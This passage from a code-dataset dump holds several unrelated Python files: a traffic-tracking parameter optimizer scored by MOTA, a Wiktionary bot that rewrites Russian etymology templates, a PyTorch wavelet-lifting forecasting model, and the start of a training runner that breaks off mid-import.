False\n","sub_path":"RPI/tests/program_test.py","file_name":"program_test.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"388789845","text":"def ex1(filename):\n \n # load initial parameters from x.txt\n f = open(filename, 'r+')\n l = f.readline()\n x = [s for s in l.strip().split(\" \")]\n f.close()\n \n # create 
para-value list\n para = paraValueList(x)\n \n \"\"\"#load video sequence record\n record = sequenceRecord()\"\"\"\n \n # run process including trackingfeature, groupfeature, load groundtruth, compute mota\n print(process(para))\n\n\ndef paraValueList(x):\n #create para-value list\n #list of the 8 parameters and their values\n pn = 8\n p = pn*[None]\n p[0] = '--feature-quality' #[0-0.4]\n p[1] = '--min-feature-distanceklt' #[0-6] \n p[2] = '--window-size' #[3-10]integer\n p[3] = '--min-tracking-error' #[0.01-0.3]\n p[4] = '--min-feature-time' #[2-100]integer\n p[5] = '--mm-connection-distance' #[1.5-100]\n p[6] = '--mm-segmentation-distance' #[1-100]\n p[7] = '--min-nfeatures-group' #[2-4]\n \n para = []\n for n in range(pn):\n para = para + [p[n],x[n]]\n \n return para\n\n\ndef process(para):\n Mota = []\n gtDatabaseaAbsPaths = []\n\n cwd = os.getcwd()\n # move to the location of the intersection\n os.chdir(intersectionAbsPath)\n\n # find all folders in the intersection directory\n folder = [file for file in os.listdir() if os.path.isdir(file)]\n # find dates with visible data\n for date in folder:\n visibleDataDate = date + \"/Visible/\"\n if os.path.exists(visibleDataDate):\n # iterate through all the files to find ground truth sqlite files\n gtDatabaseaAbsPaths.append([os.path.abspath(visibleDataDate + file) for file in os.listdir(visibleDataDate)\n if file.endswith(\"_gt.sqlite\")][0])\n\n for gtDatabaseAbsPath in gtDatabaseaAbsPaths:\n configFilename = os.path.abspath(os.path.join(gtDatabaseAbsPath, \"../../..\")) + \"/tracking-visible.cfg\"\n gtDatabaseBasename = gtDatabaseAbsPath[:-10]\n videoFilename = gtDatabaseBasename + \".MP4\"\n databaseFilename = gtDatabaseBasename + \".sqlite\"\n gtDatabaseDirname = os.path.dirname(gtDatabaseAbsPath)\n homographyFilename = gtDatabaseDirname + \"/homography.txt\"\n maskFilename = gtDatabaseDirname + \"/mask.png\"\n # Skip feature tracking if the user specified to optimize only grouping parameters\n if not args.optimizeGroupingOnly:\n # Track features\n trackingFeature(para, configFilename, videoFilename, databaseFilename, homographyFilename, maskFilename)\n # Group features\n groupFeature(para, configFilename, videoFilename, databaseFilename, homographyFilename, maskFilename)\n #load trajectory\n objects = storage.loadTrajectoriesFromSqlite(databaseFilename, 'object')\n #load ground truth\n annotations = storage.loadTrajectoriesFromSqlite(gtDatabaseAbsPath, 'object')\n # Appending negative mota because nomad minimizes the output\n Mota.append(-computeMota(annotations, objects, Mota))\n \n # Change to the previous directory\n os.chdir(cwd)\n\n return np.mean(Mota)\n\n\ndef trackingFeature(para, config, video, db, homo, mask):\n # remove previous tracking\n if os.path.exists(db):\n os.remove(db)\n # trackingfeature command parameters\n tf = ['feature-based-tracking', config, '--tf', '--video-filename', video, '--database-filename', db, '--homography-filename', homo, '--mask-filename', mask]\n # run in command line and print directly\n subprocess.check_output(tf + para[0:10])\n\ndef groupFeature(para, config, video, db, homo, mask):\n #remove previous grouping\n storage.deleteFromSqlite(db, 'object')\n #groupfeature command parameters\n gf = ['feature-based-tracking', config, '--gf', '--video-filename', video, '--database-filename', db, '--homography-filename', homo, '--mask-filename', mask]\n #run in command line and print directly\n subprocess.check_output(gf + para[10:16])\n\ndef computeMota(annotations, objects, Mota):\n matchingDistance = 
500\n firstInstant = 0\n lastInstant = 50000\n return moving.computeClearMOT(annotations, objects, matchingDistance, firstInstant, lastInstant)[1]\n\n\nif __name__ == \"__main__\":\n import argparse\n import pickle\n import sys\n from trafficintelligence import moving, storage\n import numpy as np\n #from numpy import loadtxt\n #from numpy.linalg import inv\n import subprocess\n import os\n\n # Load args that were given with select-arguments.py\n f = open('arguments.pckl', 'rb')\n args = pickle.load(f)\n f.close()\n\n intersectionAbsPath = os.path.abspath(args.intersection)\n\n ex1(sys.argv[1])\n sys.exit(0)\n","sub_path":"methodology/optimization/tracking-mota.py","file_name":"tracking-mota.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"543688510","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Convert expressions like {{affix|ru|кот|alt1=ко́то-|кафе́|tr2=kafɛ́}} to {{affix|ru|кот|-о-|кафе́|tr3=kafɛ́}}.\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, site, tname\n\nimport rulib\nimport ruheadlib\n\netym_change = False\n\ndef stringize_heads(heads):\n return \",\".join(\"%s%s%s\" % (\n ru, \"//%s\" % tr if tr else \"\", \"[lemma]\" if is_lemma else \"\")\n for ru, tr, is_lemma in heads)\n\ndef find_stress(term, pagemsg):\n # Look up a term to find its accented form. If it's monosyllabic or\n # already stressed, this isn't necessary. At the point we're called,\n # there's no tr1= param; we skipped that case.\n if rulib.is_monosyllabic(term) or rulib.is_stressed(term):\n return term, None\n if term.endswith(\"ый\") and rulib.is_monosyllabic(term[:-2]):\n return rulib.make_beginning_stressed_ru(term), None\n cached, info = ruheadlib.lookup_heads_and_inflections(term, pagemsg)\n if info is None:\n pagemsg(\"WARNING: Can't accent, page doesn't exist: %s\" % term)\n elif info == \"redirect\":\n # FIXME, should follow redirects\n pagemsg(\"WARNING: Can't accent, page is a redirect: %s\" % term)\n elif info == \"no-russian\":\n pagemsg(\"WARNING: Can't accent, page has no Russian section: %s\" % term)\n else:\n heads, inflections_of, adj_forms = info\n heads_ignoring_lemma = set((ru, tr) for ru, tr, is_lemma in heads)\n if len(heads_ignoring_lemma) == 1:\n return list(heads_ignoring_lemma)[0]\n elif len(heads_ignoring_lemma) == 0:\n pagemsg(\"WARNING: Can't accent, no heads on page: %s\" % term)\n else:\n pagemsg(\"WARNING: Can't accent, multiple accented forms on page %s: %s\" %\n (term, stringize_heads(heads)))\n return term, None\n\ndef process_text_on_page(index, pagetitle, text):\n global args\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n notes = []\n found_affix = False\n\n parsed = blib.parse_text(text)\n\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n\n if tn in [\"compound\", \"com\"]:\n lang = getparam(t, \"lang\")\n if (lang or getparam(t, \"1\")) != \"ru\":\n continue\n if lang:\n # Fetch all params, moving numbered params over to the right by one.\n params = [(\"1\", lang, False)]\n for param in t.params:\n pname = str(param.name)\n if re.search(\"^[0-9]+$\", pname):\n params.append((str(int(pname) + 1), param.value, param.showkey))\n elif pname != \"lang\":\n params.append((pname, param.value, param.showkey))\n # Erase all params.\n del t.params[:]\n # Put back parameters in order.\n for name, value, showkey in params:\n t.add(name, value, showkey=showkey, 
preserve_spacing=False)\n t.name = \"affix\"\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n notes.append(\"convert {{compound}} to {{affix}}\")\n origt = str(t)\n tn = tname(t)\n\n if tn in [\"affix\", \"af\"]:\n if getparam(t, \"1\") != \"ru\":\n continue\n m = re.search(r\"\\n(.*?%s.*?)\\n\" % re.escape(origt), text)\n if not m:\n pagemsg(\"WARNING: Something wrong, can't find template in text: %s\" % origt)\n continue\n line = m.group(1)\n\n def warning(textmsg):\n if etym_change:\n pagemsg(\"WARNING: %s: /// %s /// %s\" % (textmsg, line, line))\n else:\n pagemsg(\"WARNING: %s: %s\" % (textmsg, origt))\n\n found_affix = True\n alt1 = getparam(t, \"alt1\")\n if alt1 and re.search(\"[ое]-$\", alt1):\n tr1 = getparam(t, \"tr1\")\n if tr1:\n warning(\"Found alt1= and tr1=, not sure what to do\")\n continue\n term = getparam(t, \"2\")\n term, termtr = find_stress(term, pagemsg)\n # Fetch all params, moving params > 1 over to the right by one.\n params = []\n for param in t.params:\n pname = str(param.name)\n if pname == \"1\":\n params.append((pname, param.value, param.showkey))\n elif pname == \"2\":\n params.append((\"2\", term, False))\n if termtr:\n params.append((\"tr1\", termtr, True))\n params.append((\"3\", alt1.endswith(\"о-\") and \"-о-\" or \"-е-\", False))\n elif pname != \"alt1\":\n if re.search(\"^[0-9]+$\", pname):\n params.append((str(int(pname) + 1), param.value, param.showkey))\n else:\n m = re.search(\"^(.*?)([0-9]+)$\", pname)\n if m and int(m.group(2)) > 1:\n params.append((m.group(1) + str(int(m.group(2)) + 1), param.value, param.showkey))\n else:\n params.append((pname, param.value, param.showkey))\n # Erase all params.\n del t.params[:]\n # Put back parameters in order.\n for name, value, showkey in params:\n t.add(name, value, showkey=showkey, preserve_spacing=False)\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n notes.append(\"convert use of alt1= in etyms to proper use of interfixes\")\n else:\n for param in t.params:\n if str(param.value) in [\"-о-\", \"-е-\"]:\n for param2 in t.params:\n if str(param2.name) == \"alt1\":\n warning(\"Has both interfix and alt1= in affix template\")\n break\n else:\n pagemsg(\"Already has interfix in affix template: %s\" % origt)\n break\n else:\n if \"-\" in pagetitle:\n pagemsg(\"No interfix but pagetitle '%s' has hyphen, probably OK: %s\" % (pagetitle, origt))\n elif \" \" in pagetitle:\n pagemsg(\"No interfix but pagetitle '%s' has space, probably OK: %s\" % (pagetitle, origt))\n else:\n warning(\"No interfix and no alt1= alternative\")\n\n if not found_affix:\n pagemsg(\"WARNING: No affix template\")\n\n return str(parsed), notes\n\nparser = blib.create_argparser('Convert use of alt1= in etyms to proper use of interfixes',\n include_pagefile=True, include_stdin=True)\nparser.add_argument('--etym-change', action=\"store_true\",\n help=\"If specified, output warning lines in a format that they can be edited and the changes uploaded.\")\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\netym_change = args.etym_change\n\nblib.do_pagefile_cats_refs(args, start, end, process_text_on_page, edit=True, stdin=True,\n default_cats=[\"Russian compound words\"])\n","sub_path":"convert_etym_to_interfix.py","file_name":"convert_etym_to_interfix.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"607737631","text":"\nimport numpy as np\n\nimport math\nimport torch\nimport torch.nn as 
nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nimport json\nfrom numpy.lib.stride_tricks import as_strided as ast\n\nfrom torch import nn\nfrom torch import optim\nimport torch\n\nimport pickle as cp\nimport pywt\nfrom torch.nn.utils import weight_norm\n\n\nimport argparse\n\n\n\n\n\n\n\nclass Splitting(nn.Module):\n def __init__(self):\n super(Splitting, self).__init__()\n # Deciding the stride base on the direction\n # self.conv_even = lambda x: x[:, ::2, :]\n # self.conv_odd = lambda x: x[:, 1::2, :]\n\n def even(self, x):\n return x[:, ::2, :]\n def odd(self, x):\n return x[:, 1::2, :]\n\n # def forward(self, x):\n # '''Returns the odd and even part'''\n # return (self.conv_even(x), self.conv_odd(x))\n\n def forward(self, x):\n '''Returns the odd and even part'''\n return (self.even(x), self.odd(x))\n\n\n\n\n\n\nclass LiftingScheme(nn.Module):\n def __init__(self, args, in_planes, modified=False, size=[], splitting=True, k_size=4, dropout=0.5, simple_lifting=False):\n super(LiftingScheme, self).__init__()\n self.modified = args.INN\n\n kernel_size = args.kernel\n dilation = args.dilation\n pad = dilation * (kernel_size - 1) // 2 + 1 # 2 1 0 0\n # pad = k_size // 2\n self.splitting = splitting\n self.split = Splitting()\n\n # Dynamic build sequential network\n modules_P = []\n modules_U = []\n modules_psi = []\n modules_phi = []\n prev_size = 1\n\n # HARD CODED Architecture\n if simple_lifting:\n modules_P += [\n nn.ReplicationPad1d(pad),\n nn.Conv2d(in_planes, in_planes,\n kernel_size=kernel_size, stride=1),\n nn.Dropout(dropout),\n nn.Tanh()\n ]\n modules_U += [\n nn.ReplicationPad1d(pad),\n nn.Conv2d(in_planes, in_planes,\n kernel_size=kernel_size, stride=1),\n\n nn.Dropout(dropout),\n nn.Tanh()\n ]\n else:\n size_hidden = args.hidden_size\n modules_P += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n modules_U += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n if self.modified:\n modules_phi += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n modules_psi += [\n nn.ReplicationPad1d(pad),\n nn.Conv1d(in_planes * prev_size, int(in_planes * size_hidden),\n kernel_size=kernel_size, dilation=dilation, stride=1),\n nn.LeakyReLU(negative_slope=0.01, inplace=True),\n nn.Dropout(dropout),\n nn.Conv1d(int(in_planes * size_hidden), in_planes,\n kernel_size=3, stride=1),\n nn.Tanh()\n ]\n self.phi = nn.Sequential(*modules_phi)\n self.psi = nn.Sequential(*modules_psi)\n\n self.P = nn.Sequential(*modules_P)\n self.U = nn.Sequential(*modules_U)\n\n def forward(self, x):\n if self.splitting:\n # 3 224 112\n # 3 112 112\n (x_even, x_odd) = self.split(x)\n else:\n (x_even, x_odd) = x\n\n if self.modified:\n x_even = x_even.permute(0, 2, 1)\n x_odd = 
x_odd.permute(0, 2, 1)\n x_odd_update = x_odd.mul(torch.exp(self.phi(x_even))) - self.P(x_even)\n x_even_update = x_even.mul(torch.exp(self.psi(x_odd_update))) + self.U(x_odd_update)\n\n return (x_even_update, x_odd_update)\n\n else:\n\n x_even = x_even.permute(0, 2, 1)\n x_odd = x_odd.permute(0, 2, 1)\n\n d = x_odd - self.P(x_even)\n c = x_even + self.U(d)\n\n return (c, d)\n\n\nclass LiftingSchemeLevel(nn.Module):\n def __init__(self, args, in_planes, share_weights, modified=False, size=[2, 1], kernel_size=4, simple_lifting=False):\n super(LiftingSchemeLevel, self).__init__()\n self.level = LiftingScheme(args,\n in_planes=in_planes, modified=modified,\n size=size, k_size=kernel_size, simple_lifting=simple_lifting)\n\n def forward(self, x):\n '''Returns (LL, LH, HL, HH)'''\n # (L, H)\n (x_even_update, x_odd_update) = self.level(x) # 10 3 224 224\n\n return (x_even_update, x_odd_update)\n\n\nclass BottleneckBlock(nn.Module):\n def __init__(self, in_planes, out_planes, disable_conv):\n super(BottleneckBlock, self).__init__()\n self.bn1 = nn.BatchNorm1d(in_planes)\n self.relu = nn.ReLU(inplace=True)\n # self.relu = nn.LeakyReLU(negative_slope=0.01, inplace=True)\n\n self.disable_conv = disable_conv # in_planes == out_planes\n if not self.disable_conv:\n self.conv1 = nn.Conv1d(in_planes, out_planes, kernel_size=1, stride=1,\n padding=0, bias=False)\n\n def forward(self, x):\n if self.disable_conv:\n return self.relu(self.bn1(x))\n else:\n return self.conv1(self.relu(self.bn1(x)))\n\n\nclass LevelWASN(nn.Module):\n def __init__(self, args, in_planes, lifting_size, kernel_size, no_bottleneck,\n share_weights, simple_lifting, regu_details, regu_approx):\n super(LevelWASN, self).__init__()\n self.regu_details = regu_details\n self.regu_approx = regu_approx\n if self.regu_approx + self.regu_details > 0.0:\n self.loss_details = nn.SmoothL1Loss()\n\n self.wavelet = LiftingSchemeLevel(args, in_planes, share_weights,\n size=lifting_size, kernel_size=kernel_size,\n simple_lifting=simple_lifting)\n self.share_weights = share_weights\n if no_bottleneck:\n # We still want to do a BN and RELU, but we will not perform a conv\n # as the input_plane and output_plare are the same\n self.bootleneck = BottleneckBlock(in_planes, in_planes, disable_conv=True)\n else:\n self.bootleneck = BottleneckBlock(in_planes, in_planes, disable_conv=False)\n\n def forward(self, x):\n (x_even_update, x_odd_update) = self.wavelet(x) # 10 9 128\n approx = x_even_update\n details = x_odd_update\n r = None\n if (self.regu_approx + self.regu_details != 0.0): # regu_details=0.01, regu_approx=0.01\n\n if self.regu_details:\n rd = self.regu_details * \\\n details.abs().mean()\n\n # Constrain on the approximation\n if self.regu_approx:\n rc = self.regu_approx * torch.dist(approx.mean(), x.mean(), p=2)\n\n if self.regu_approx == 0.0:\n # Only the details\n r = rd\n elif self.regu_details == 0.0:\n # Only the approximation\n r = rc\n else:\n # Both\n r = rd + rc\n\n if self.bootleneck:\n return self.bootleneck(approx).permute(0, 2, 1), r, details\n else:\n return approx.permute(0, 2, 1), r, details\n\n\n\nclass EncoderTree(nn.Module):\n def __init__(self, level_layers, level_parts, Encoder = True, norm_layer=None):\n super(EncoderTree, self).__init__()\n self.level_layers = nn.ModuleList(level_layers)\n self.conv_layers = None #nn.ModuleList(conv_layers) if conv_layers is not None else None\n self.norm = norm_layer\n # self.level_part = [[1, 1], [0, 0], [0, 0]]\n self.level_part = level_parts #[[0, 1], [0, 0]]\n\n self.count_levels = 0\n 
self.ecoder = Encoder\n\n def reOrder(self, num_of_length, layer=2):\n N = num_of_length\n n = list(range(1, N + 1, 1))\n remain = [i % 2 for i in n]\n integ = [int(i / 2) for i in n]\n n_1 = []\n for i in range(N):\n if remain[i] > 0:\n n_1.append((n[i] + 1) / 2 + N / 2)\n else:\n n_1.append(n[i] / 2)\n\n remain = [i % 2 for i in n_1]\n integ = [int(i / 2) for i in n_1]\n\n n_2 = []\n rem4 = [i % 4 for i in n]\n\n for i in range(N):\n if rem4[i] == 0:\n n_2.append(int(n[i] / 4))\n\n elif rem4[i] == 1:\n\n n_2.append(int((3 * N + 3) / 4 + n[i] / 4))\n elif rem4[i] == 2:\n n_2.append(int((1 * N + 2) / 4 + n[i] / 4))\n elif rem4[i] == 3:\n n_2.append(int((2 * N + 1) / 4 + n[i] / 4))\n else:\n print(\"Error!\")\n\n n_3 = []\n rem8 = [i % 8 for i in n]\n for i in range(N):\n if rem8[i] == 0:\n n_3.append(int(n[i] / 8))\n elif rem8[i] == 1:\n n_3.append(int(n[i] / 8 + (7 * N + 7) / 8))\n elif rem8[i] == 2:\n n_3.append(int(n[i] / 8 + (3 * N + 6) / 8))\n elif rem8[i] == 3:\n n_3.append(int(n[i] / 8 + (5 * N + 5) / 8))\n elif rem8[i] == 4:\n n_3.append(int(n[i] / 8 + (1 * N + 4) / 8))\n elif rem8[i] == 5:\n n_3.append(int(n[i] / 8 + (6 * N + 3) / 8))\n elif rem8[i] == 6:\n n_3.append(int(n[i] / 8 + (2 * N + 2) / 8))\n elif rem8[i] == 7:\n n_3.append(int(n[i] / 8 + (4 * N + 1) / 8))\n\n else:\n print(\"Error!\")\n if layer == 1:\n return [i - 1 for i in n_1]\n if layer == 2:\n return [i - 1 for i in n_2]\n if layer == 3:\n return [i - 1 for i in n_3]\n\n\n def forward(self, x, attn_mask=None):\n\n # x [B, L, D] torch.Size([16, 336, 512])\n rs = [] # List of constrains on details and mean\n det = [] # List of averaged pooled details\n x_reorder = []\n input = [x, ]\n for l in self.level_layers:\n x_even_update, r, x_odd_update = l(input[0])\n\n if self.level_part[self.count_levels][0]:\n input.append(x_even_update)\n else:\n x_even_update = x_even_update.permute(0, 2, 1)\n det += [x_even_update] ##############################################################################\n if self.level_part[self.count_levels][1]:\n x_odd_update = x_odd_update.permute(0, 2, 1)\n input.append(x_odd_update)\n else:\n det += [x_odd_update] ##############################################################################\n del input[0]\n rs += [r]\n self.count_levels = self.count_levels + 1\n\n for aprox in input:\n aprox = aprox.permute(0, 2, 1) # b 77 1\n # aprox = self.avgpool(aprox) ##############################################################################\n det += [aprox]\n\n self.count_levels = 0\n # We add them inside the all GAP detail coefficients\n\n x = torch.cat(det, 2) # torch.Size([32, 307, 12])\n index = self.reOrder(x.shape[2], layer=2)\n x_reorder = [x[:, :, i].unsqueeze(2) for i in index]\n\n x_reorder = torch.cat(x_reorder, 2)\n\n x = x_reorder.permute(0, 2, 1)\n # x = x.permute(0, 2, 1)\n if self.norm is not None:\n x = self.norm(x) #torch.Size([16, 512, 336])\n\n return x\n\nclass Chomp1d(nn.Module):\n def __init__(self, chomp_size):\n super(Chomp1d, self).__init__()\n self.chomp_size = chomp_size\n\n def forward(self, x):\n return x[:, :, :-self.chomp_size].contiguous()\n\n\nclass WASN(nn.Module):\n def __init__(self, args, num_classes, num_stacks = 3 , first_conv=9,\n number_levels=4, number_level_part=[[1, 0], [1, 0], [1, 0]],\n no_bootleneck=True):\n super(WASN, self).__init__()\n\n\n\n\n # First convolution\n\n\n # self.first_conv = True\n # self.conv_first = nn.Sequential(\n # weight_norm(nn.Conv1d(first_conv, int(args.hidden_size * first_conv),\n # kernel_size=2, stride=1, padding=1, 
bias=False)),\n # # nn.BatchNorm1d(extend_channel),\n # Chomp1d(1),\n # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # nn.Dropout(0.5),\n # # weight_norm(nn.Conv1d(args.hidden_size * first_conv, first_conv,\n # # kernel_size=2, stride=1, padding=1, bias=False)),\n # #\n # # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # # nn.Dropout(0.5),\n # )\n # self.conv_Second = nn.Sequential(\n # weight_norm(nn.Conv1d(first_conv, int(args.hidden_size * first_conv),\n # kernel_size=2, stride=1, padding=1, bias=False)),\n # # nn.BatchNorm1d(extend_channel),\n # Chomp1d(1),\n # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # nn.Dropout(0.5),\n # # weight_norm(nn.Conv1d(args.hidden_size * first_conv, first_conv,\n # # kernel_size=2, stride=1, padding=1, bias=False)),\n # #\n # # nn.LeakyReLU(negative_slope=0.01, inplace=True),\n # # nn.Dropout(0.5),\n # )\n\n\n\n in_planes = first_conv\n out_planes = first_conv * (number_levels + 1)\n self.pe = args.positionalEcoding\n\n self.blocks1 = EncoderTree(\n [\n LevelWASN(args = args, in_planes=in_planes,\n lifting_size=[2, 1], kernel_size=4, no_bottleneck=True,\n share_weights=False, simple_lifting=False, regu_details=0.01, regu_approx=0.01)\n\n for l in range(number_levels)\n ],\n\n\n level_parts = number_level_part,\n Encoder = True\n )\n\n self.blocks2 = EncoderTree(\n [\n LevelWASN(args=args, in_planes=in_planes,\n lifting_size=[2, 1], kernel_size=4, no_bottleneck=True,\n share_weights=False, simple_lifting=False, regu_details=0.01, regu_approx=0.01)\n\n for l in range(number_levels)\n ],\n\n\n level_parts= number_level_part,\n Encoder = False\n )\n\n if no_bootleneck:\n in_planes *= 1\n\n self.num_planes = out_planes\n\n\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n            elif isinstance(m, nn.BatchNorm2d):\n                m.weight.data.fill_(1)\n                m.bias.data.zero_()\n            elif isinstance(m, nn.Linear):\n                # nn.init.xavier_uniform_(m.weight.data)\n                # if m.bias is not None:\n                m.bias.data.zero_()\n\n\n        self.projection1 = nn.Conv1d(args.window_size, num_classes,\n                                     kernel_size=1, stride=1, bias=False)\n\n        self.projection2 = nn.Conv1d(args.window_size+num_classes, num_classes,\n                                     kernel_size=1, stride=1, bias=False)\n\n\n        \n        self.hidden_size = in_planes \n        # For positional encoding\n        if self.hidden_size%2 == 1:\n            self.hidden_size += 1\n\n        num_timescales = self.hidden_size // 2 # half the embedding dimension: one half is used for sin, the other half for cos\n        max_timescale = 10000.0\n        min_timescale = 1.0\n        # min_timescale: the smallest timescale applied at each position\n        # max_timescale: the largest timescale applied at each position\n        log_timescale_increment = (\n            math.log(float(max_timescale) / float(min_timescale)) /\n            max(num_timescales - 1, 1)) # factor log(max/min) / (256-1)\n        temp = torch.arange(num_timescales, dtype=torch.float32)\n        inv_timescales = min_timescale * torch.exp(\n            torch.arange(num_timescales, dtype=torch.float32) *\n            -log_timescale_increment) # divide log(max/min) evenly into num_timescales parts (half the embedding dimension)\n        self.register_buffer('inv_timescales', inv_timescales)\n    def get_position_encoding(self, x):\n        max_length = x.size()[1]\n        position = torch.arange(max_length, dtype=torch.float32,\n                                device=x.device) #tensor([0., 1., 2., 3., 4.], device='cuda:0')\n        temp1 = position.unsqueeze(1) #5 1\n        temp2 = self.inv_timescales.unsqueeze(0) #1 256\n        scaled_time = position.unsqueeze(1) * self.inv_timescales.unsqueeze(0) #5 256\n        signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)],\n                           dim=1) #5 512 [T, C]\n        signal = F.pad(signal, (0, 0, 0, self.hidden_size % 2))\n        signal = signal.view(1, max_length, self.hidden_size)\n\n\n\n        # signal = F.pad(signal, (1, self.hidden_size % 2), \"constant\", 0)\n        # if self.hidden_size % 2==1:\n        #     signal = signal[:,1:]\n        # signal = signal.view(1, max_length, self.hidden_size)\n        \n        return signal\n\n    def creatMask(self, x):\n        b, l, c = x.shape\n        mask_ratio = nn.Dropout(p=0.8)\n        Mask = torch.ones(b, l, c, device=x.device)\n        Mask = mask_ratio(Mask)\n        Mask = Mask > 0 # torch.Size([8, 1, 48, 48])\n        Mask = Mask\n        x.masked_fill(Mask, 0)\n        return x\n\n    def forward(self, x):\n        if self.pe:\n            pe = self.get_position_encoding(x)\n            if pe.shape[2]>x.shape[2]:\n                x += pe[:,:,:-1]\n            else:\n                x += self.get_position_encoding(x)\n        # res1 = x\n        # if self.first_conv:\n        #     x = x.permute(0,2,1)\n        #     x = self.conv_first(x)\n        #     x = x.permute(0, 2, 1)\n        # x = self.creatMask(x)\n        res1 = x\n\n        x = self.blocks1(x, attn_mask=None)\n\n        x += res1\n\n        x = self.projection1(x)\n        MidOutPut = x\n\n        x = torch.cat((res1, x), dim=1)\n        # res2 = x\n\n        # if self.first_conv:\n        #     x = x.permute(0,2,1)\n        #     x = self.conv_Second(x)\n        #     x = x.permute(0, 2, 1)\n\n        res2 = x\n\n        x = self.blocks2(x, attn_mask=None)\n        x += res2\n        x = self.projection2(x)\n        return x, MidOutPut\n\n\n\n\n\n\n\n\n\ndef get_variable(x):\n    x = Variable(x)\n    return x.cuda() if torch.cuda.is_available() else x\n\n\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--train', type=bool, default=True)\n    parser.add_argument('--evaluate', type=bool, default=False)\n    parser.add_argument('--dataset', type=str, default='PeMS03_data') # PeMS07\n    parser.add_argument('--window_size', type=int, default=12)\n    parser.add_argument('--horizon', type=int, default=12)\n    parser.add_argument('--train_length', type=float, default=7)\n    parser.add_argument('--valid_length', type=float, default=2)\n    parser.add_argument('--test_length', 
type=float, default=1)\n parser.add_argument('--epoch', type=int, default=50)\n parser.add_argument('--lr', type=float, default=3 * 1e-5)\n parser.add_argument('--multi_layer', type=int, default=5)\n parser.add_argument('--device', type=str, default='cuda:0')\n parser.add_argument('--validate_freq', type=int, default=1)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--norm_method', type=str, default='z_score')\n parser.add_argument('--optimizer', type=str, default='RMSProp')\n parser.add_argument('--early_stop', type=bool, default=False)\n parser.add_argument('--exponential_decay_step', type=int, default=5)\n parser.add_argument('--decay_rate', type=float, default=0.5)\n parser.add_argument('--dropout_rate', type=float, default=0.5)\n parser.add_argument('--leakyrelu_rate', type=int, default=0.2)\n\n # Action Part\n\n parser.add_argument('--share-weight', default=0, type=int, help='share weight or not in attention q,k,v')\n parser.add_argument('--temp', default=0, type=int, help='Use temporature weights or not, if false, temp=1')\n parser.add_argument('--hidden-size', default=1, type=int, help='hidden channel of module')\n parser.add_argument('--INN', default=1, type=int, help='use INN or basic strategy')\n parser.add_argument('--kernel', default=3, type=int, help='kernel size')\n parser.add_argument('--dilation', default=1, type=int, help='dilation')\n parser.add_argument('--positionalEcoding', type=bool, default=True)\n\n args = parser.parse_args()\n # part = [[1, 1], [1, 1], [1, 1], [0, 0], [0, 0], [0, 0], [0, 0]] # Best model\n part = [[1, 1], [0, 0], [0, 0]]\n # part = [ [0, 0]]\n\n print('level number {}, level details: {}'.format(len(part), part))\n model = WASN(args, num_classes=12, first_conv=307,\n number_levels=len(part),\n number_level_part=part).cuda()\n x = torch.randn(32, 12, 307).cuda()\n y,res = model(x)\n print(y.shape)","sub_path":"models/StackTWaveNetTransformerEncoder.py","file_name":"StackTWaveNetTransformerEncoder.py","file_ext":"py","file_size_in_byte":22322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490601471","text":"import math\nimport torch\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as model_scheduler\nimport pprint\n\nimport matplotlib.pyplot as plt\n\n# import model.model as model_arch\nimport model.loss as model_loss\nimport data_loader.augmentations as augmentations\nimport data_loader.data_loaders as model_data_loaders\nimport utils.plot as plot\n\nfrom trainer.trainer import Trainer\nfrom torchsummary import summary\n\nfrom utils.config import get_instance, setup_seed, setup_device, setup_model_params\nfrom utils.logger import setup_logger\nfrom utils.grad_cam import get_gradcam, plot_gradcam\nfrom utils.lr_finder import LRFinder\n\nlogger = setup_logger(__name__)\n\n\nclass Runner:\n def __init__(self, config, custom_model=False):\n self.config = config\n self.custom_model = custom_model\n\n def setup_train(self):\n config = self.config\n logger.info(\"Training Configuration\")\n\n if self.custom_model is True:\n import model.custom_model as model_arch\n else:\n import 